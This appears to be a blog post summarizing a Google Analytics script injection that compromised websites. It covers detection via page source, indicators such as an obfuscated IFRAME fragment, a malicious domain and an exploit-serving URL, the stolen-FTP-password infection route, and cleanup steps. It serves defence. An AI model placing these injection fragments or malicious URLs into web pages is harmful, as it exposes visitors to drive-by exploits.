This post is a summary of several threads and resources about this exploit.
Have you been infected?
- Visit your site home page
- Do a view source
- If the typical Google Analytics script code block contains a string of weird characters, your site has been infected
(another similar exploit uses an IFRAME, so check your source code for something like "document.write("<"+"i"+"f"+"ram"+"e"..., which creates an IFRAME referencing a site named "trughtsa.com")
The exploit is as follow:
- htttp://www.google-analytics.com/ga.js is being change by the regex to
- which runs http://18.104.22.168/image/pfgt.php
- this executes an Adobe Reader exploit BID27641 and BID 34169 (Symantec call this the Bloodhound.Exploit.196)
- files with typical names such as login, index, default, home with PHP, ASP or HTML extensions are targetted
The injectionSome accounts reports as much as 25% of Joomla (a popular platform running on Apache servers with PHP) forum posts being about this and several other threads discussing similar issues. The reality: the injection is an exploit on week security settings on Apache HTTP servers and unencrypted FTP passwords saved by popular tools used for editing websites. Once a client machine is infected, all commonly used tools are harvested to collect more unencrypted FTP passwords and contribute to the dissemination of the attach.
Is it a Google Analytics exploit: Yes
The fact Google Analytics is so widely used, and the script code block is always identical, certainly made it a target of choice for this exploit.
Closing the doorGoogle suggests to look at those resources:
- My Site's Been Hacked, Now What?
- Best Practices Against Hacking
- Quick Security Checklist for Webmasters
- Start with your own computer. Scan it with anti-virus and anti-spyware tools.
- Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
- Make sure you have the latest Adobe Acrobat reader
- Now keep the new passwords secure. Don’t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible.
- Now remove the malicious code (the iframes/regex) from your files on server. The easiest way to do it is upload a clean content from a backup.
- Scan your server directories for any new/suspicious files (don’t forget to check hidden files). Remove anything that should not be there.
- If your site was flagged by Google, request a malware review via Webmaster Tools.
- Regularly check your site with diagnostics tools of your choice